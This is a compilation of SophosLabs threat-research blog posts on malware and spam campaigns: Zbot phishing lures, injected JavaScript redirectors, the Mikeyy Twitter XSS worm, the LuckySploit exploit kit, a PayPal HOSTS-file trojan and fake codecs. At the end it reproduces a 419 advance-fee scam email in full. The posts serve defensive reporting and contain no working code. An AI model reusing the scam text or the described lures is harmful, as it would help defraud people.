SophosLabs blog

In the past few weeks, the authors behind Zbot has been busy. Around October 12 we have seen the server upgrade spam with links. Later on the 14th we’ve seen the same campaign with the malware attached to similar-looking server upgrade notices. By the 22nd of October, the spam messages touts Outlook updates.

For a few days during the past week, the group has turned their attention to the Federal Deposit Insurance Corporation (FDIC), spamming out links to malware sites with the message below:

With the global economy as it is, notice of bank failures would certainly draw a lot of attention and irrational behavior. After all, thoughts of hard-earned money being gone forever is going to scare a lot of people. Of course, downloading the “personal FDIC insurance file” would give nothing but grief. The bank deposits are still safe, but the computer would probably get infected.

After the blast of FDIC messages, the Zbot authors turned to facebook as their latest platform to spread malware. However, they added a twist to it. The messages are well-crafted to look like a real Facebook message:

The message asks the user to update their facebook account. The new twist is that, when they get to the linked site, there is no link to download an executable yet. Instead, they’re shown with a fake Facebook login page:

Victims who have entered their facebook login would get their account details phished, probably for the purpose of spreading more malware. Since this is not a real facebook page, any random login info would bring you to this next page:

It is on this page where the malware author provides an executable for download. This file, updatetool.exe is a Zbot executable that is proactive detected as Mal/EncPk-LE.

With the creative social engineering that the Zbot authors have been using, users should be real careful when reading messages, whether it’s in an email or from a social network. Avoid clicking links directly, manually type the address to access the site, and not executing files would do a lot in protecting one’s computer.

…well actually it’s a trojan, but it’s still malicious!

For those who had the misfortune of watching the viral video 2 Girls 1 Cup (SFW Wikipedia link) that spread across the internet like wildfire a couple years ago, people trying to sign up to view the video on the official site will now get more than they bargained for.

In fact, there are actually hundreds of compromised domains across the internet which we’ve seen over the last few days that have been infected. It seems some obfuscated javascript is being injected into these sites, which attempts to redirect the user to another domain hosting a malicious payload.

As you can see there’s nothing overly complicated about the obfuscation technique, it’s a simple matter of them escaping certain characters, and inserting a symbol at random intervals in the text. After deobfuscating the code, we see another script tag is written which points to the domain where the payload is hosted.

At the time of writing this blog the payload is no longer on the site but we suspect it will reappear sometime in the near future.

Earlier in the week we detected a file at the script target URL as Troj/SWFLdr-A but that file is no longer available.

Instead users are greeted with a simple message saying “/ No news…”. Customers will be happy to know that the original javascript redirector is detected as Troj/JSRedir-R.

It seems to be a bad week for Twitter as once again they have been targeted by an XSS attack which is spreading quickly across Twitter. It’s still not certain as to who wrote it, though “Mikeyy” is being referenced in a number of the messages that are popping up across users pages. Earlier in the week it was determined that a 17-year old named Mikeyy Mooney was responsible for the original XSS attack, and one reason he wrote the exploit was a means to advertise his website. The new attack chooses from one of the following messages and posts it to an infected users page.

Twitter, this sucks! Fix your coding.
Twitter Security Team Really? You need to be fired.
Horrible Coding!
@oprah - sup? welcome to twitter. - mikeyy
@aplusk - hey, homo. - mikeyy
@souljaboytellem - your music sucks dude. - mikeyy
@TheEllenShow - hey baby, love me long time? - mikeyy
@StephenColbert - you funny. - mikeyy
@cnnbrk - he's back. ;) - mikeyy
@nytimes - yep, it's true. - mikeyy
Twitter, do you know about the before_save model callback? - mikeyy
This exploit only affects Internet Explorer users. Thanks. - mikeyy
Twitter, BeforeSave: ForEach: DataArray: EscapeHtmlChars!!! - mikeyy
Get Firefox, thanks. www.Firefox.com
Twitter, you should be paying me now. - mikeyy

The code itself is stored in a file called xss.js on the same server as the previous attacks, not exactly trying to be very subtle. It’s slightly obfuscated though simple enough for us in the Labs to reverse.

At first glance the deobfuscated code appears as though it’s trying to create some ActiveXObjects which tells us Internet Explorer users will be affected, as one of the random comments seems to suggest. Any vulnerable users who view an infected user profile will also become infected themselves as the script is injected through the CSS, which is how it has managed to spread itself so quickly.

Sophos users will be happy to know that we currently detect the script as JS/Twitter-C. We will be keeping an eye on Twitter and reporting anything new we may find here on our blog. It is still a good idea to run Firefox and NoScript to help protect yourself from all kinds of Javascript attacks.

Over the past few months SophosLabs have been seeing a relatively new kit being used by attackers in drive-by downloads to infect victims with malware. The kit is known as LuckySploit, and in this blog I will take a brief look at it and what it currently is being used for.

It is a kit that enables attackers to construct malicious sites in order to hit victims with exploits and infect them with malware. Like many previous kits (Mpack, Firepack, Icepack, El Fiesta and the like), the pages it creates contain heavily obfuscated JavaScript in an attempt to evade detection and blocking. However, unlike previous kits, LuckySploit (or at least the recent version of it) also uses encryption.

Over the past few months numerous legitimate sites have been compromised with iframes whose purpose has been to load malicious content from various domains - mainly .cn - being controlled by criminals (also discussed by Danchev). Such compromised pages are being detected as Mal/Iframe-F.

In addition to compromised legitimate sites, I have also seen various “lure” sites that have been posted to trap victims (using celebrities, current news stories and the like to catch user traffic).

Throughout January and February, these sites were redirecting to exploit scripts (perhaps an earlier version of LuckySploit?) detected as Mal/ObfJS-BP, which were serving up exploited, mildly polymorphic PDFs (detected as Troj/PdfJS-Y).

More recently, we are seeing these sites redirecting to what appears to be the latest flavour of LuckySploit. The landing page consists of a heavily obfuscated script that is quickly recognizable. This page is blocked as Mal/ObfJS-BB (and historically as Mal/Baals also).

This script generates a passphrase and encrypts it, before sending it back to the server in another request. This ensures content sent from the server is encrypted in order to evade detection. (Not successfully though, these pages are detected as Mal/EncJS-A.) Ultimately, if exploitation is successful, the executable payload will be sent from the server (seen at the bottom of the figure below).

So what malware is being installed via LuckySploit driven attack sites? Unsurprisingly, financial motivation is driving these attacks. Previously it has been reported that LuckySploit is being used to infect victims with Zbot (the somewhat infamous banking malware also known as ‘Zeus’ that has been mentioned previously). Our findings certainly support this. But it is being used for more than just Zbot. The list below includes all the malware I have seen installed via LuckySploit attack sites over just the past few days:

• Zbot (Mal/Zbot-I, Troj/Zbot-EC, Mal/EncPk-HJ)
• Troj/Goldee-Gen
• Mal/Alureon-C
• TDSS (Mal/TDSS-A, Mal/TDSS-B)
• Autorun worms (W32/Autorun-ABJ)
• Troj/Agent-JDY

Several of these items stealth themselves once installed making subsequent detection and cleanup trickier.

In summary, LuckySploit is just another kit enabling the bad guys to construct attacks with relative ease. And with the financial sting in the tail that these attacks typically hit you with, ensuring you deploy effective web security is as important as ever.

Since earlier on today, we have been seeing an ongoing phishing attack against PayPal, and not the usual phishing email enticing the victim to click on a rogue site. Instead, the attackers have spammed out malware within a RAR attachment, using the filename rabbits.rar.

A variety of other subject lines and message bodies have been seen as well.

Anyone opening the attached archive will be greeted with malware (rabbits.exe) that once executed will:

• write adobe.vbs to the temporary folder
• run the script, using wscript.exe

The malicious VB script is a simple Trojan, overwriting the contents of the HOSTS file in order to redirect PayPal related domains to a specific IP address.

Attempting to access any of the domains subsequently will result in actually loading content from the phish site.

Detection for this malware (executable spammed out and the VB script) was included in the alert earlier on today as Troj/Agent-IYU.

To my mind, the social engineering behind this one seems rather obscure. Then again, perhaps there are more rabbit fanciers out there than I imagine…

Welcome to the SophosLabs blog, the aim is to provide regular updates on malware,spam and web based threats as they happen and provide the reader with an insight into what is happening in the ‘real world’ behind the headlines.

Every day, in every lab, we see interesting, criminal, silly and sometimes bizarre attempts by the ‘bad guys’ to find ways of achieving their goal.

Hopefully this blog will inform, interest and occasionally entertain you.

Each week I will try to provide a summary of the week and highlight trends etc to give the reader a better understanding of what is really happening behind the closed doors of SophosLabs

(by the way, I don’t have an office in the corner, in fact I don’t have an office)

Many of the Zlob’s we see to date, attempt to trick the user into installing it by masquerading as one or more movie or audio codecs. Unsuspecting users may attempt to install these, in an attempt to get a video or song to play properly.

Most of the time the Zlob authors simply package their malicious code in a fake codec installer, that to many people would seem quite legitimate! This hasn’t always been effective since our virus engine is quite capable of detecting the malicious code, even packaged inside the installer. However a new technique is now being employed by the Zlob authors in an attempt to make their malware more adaptable and harder to detect, they are now taking advantage of some of the advanced functionality that is offered by modern Setup, or Install packages, such as NSIS, Wise and Installshield: the ability to install updated setup files directly off the internet.

These packages enable the malware authors to create an innocuous setup wizard for a dummy program, which then downloads the malware from a specified website automatically. Essentially the malware authors are using the setup wizards to download their malware for them!

Fortunately we can attack this on two fronts, we can detect the fake installers with our virus engine and block the download site with our WS1000 (and anti-spam products if necessary).

This renders this attack almost useless!

Many of us are now aware as to the subtle shift in the nature of emerging threats, where once many viruses and Trojans were written for fun (or to prove a point),  evidence strongly suggests that malware is increasingly being used as a means to gain profit. I have a good example of such today, Troj/Clickr-EK.

This Trojan among other things, contains functionality to load a very specific website in an Internet Explorer window, enumerating a specific set of links and ‘clicking’ each one as if a user had navigated to, and clicked the links themselves. Interestingly enough the numerous links were all leading to a dutch website named “the crime game of the internet” - all with different referrer id’s.

The website claims to be a game, where “clicks” are used as a type of virtual money. It seemed that one of the members had written this Trojan for the sole purpose of cheating!

Thats not much of a profit, you might say. However the website also seems to reward members with competitions, giving away gifts and prizes such as computer hardware and gaming consoles, to those that come out on top. Perhaps cheating in such a way gave the author (and his friends) enough bias to make winning these prizes a certainty, in which case the profit is very real indeed…

One of the problems with having global operations for malware and spam analysis within SophosLabs is that “holidays” like Mother’s Day can change depending on what country you live in. So rather than running out and buying my mom flowers when I see Mother’s Day spam. I have to remember that for the UK Mother’s Day was earlier in the year.

Spammers do target the largest market, which in this case is the USA, however according to online sources there are 23 possible dates worldwide for Mother’s Day. So maybe the florist and my mom will be happy.

Those 419 scammers never ever give up! Attached is a copy of their latest spam campaign.

But it’s OK, because this time it’s from the crime prevention folks at the United Nations - that should make you feel much more secure. Apparently, if you send them some personally identifiable information, and, no doubt, an endless stream of wire transfers, you’ll receive 2 ‘Security Proof Box’ full of cash! If you believe them, I have a lovely bridge you might be interested in.

Remember the Sophos motto regarding spam: Don’t try, Don’t buy, Don’t reply!

Neil, SophosLabs AU

Attn: Beneficiary,

I am delighted to inform you that the UNITED NATION CRIME PREVENTION UNIT Management through the Office of the UNION BANK CHAIRMAN and other bank directors have decided to call back all approved fund Payment through offshore payment centers to the bank treasury following Interception of the UNITED NATION CRIME PREVENTION UNIT AND WORLD BANK and have concluded arrangements to pay you this Funds by cash through the Diplomatic Agents who will bring the cash in a Machine sealed consignment to you in the United States as my bank has temporarily stopped further Payment via wire transfer. In this regards we are going to send your inheritance/ contract payment to you via our accredited Diplomatic Agent/shipping Company and we have secured every needed document to cover the money.

Note: The money is coming on 2 security proof box. The box are sealed with synthetic nylon seal and padded with machine Please you dont have to worry for anything, as the Transaction is 100% risk free. The Boxes are coming with A Diplomatic agent who will accompany the boxes to your house address. All you need to do now is to Reconfirm to us;

Your Full Name
Contact House Address
Occupation
Age
Country
Your mobile phone;

The Diplomatic Attached will travel with it. They will call you immediately they arrive in your country’s airport to your house. I hope you understand me.Note: The diplomat does not know the original contents of the boxes. What l declared to them as the contents is Sensitive Photographic Film Materials for security reasons. I did not declare money to them please. If they call you and ask you the contents please tell them the same thing Ok.

You will secure the ;

1)Diplomatic immunity clearance certificate and the
2)Certificate of fund ownership,
3)lrrevocable Letter of Guarantee

Without this three certificate, your Payment fund will not be approve, can not be courier for this payment season, the needed certificate will Make it pass every custom Checkpoint all over the world without hitch. Confirm the receipt of this message and re-send the requirements to me immediately you receive this message. Please I need urgent reply because the boxes are
Schedule to live as soon as we hear from you. I will try to contact you today again and attached the money as being taken to the diplomat service Company for delivering.

Thanks.

Yours truly,
Mr.NKE ONYE

Head,
UNITED NATIONS CRIME PREVENTION UNIT.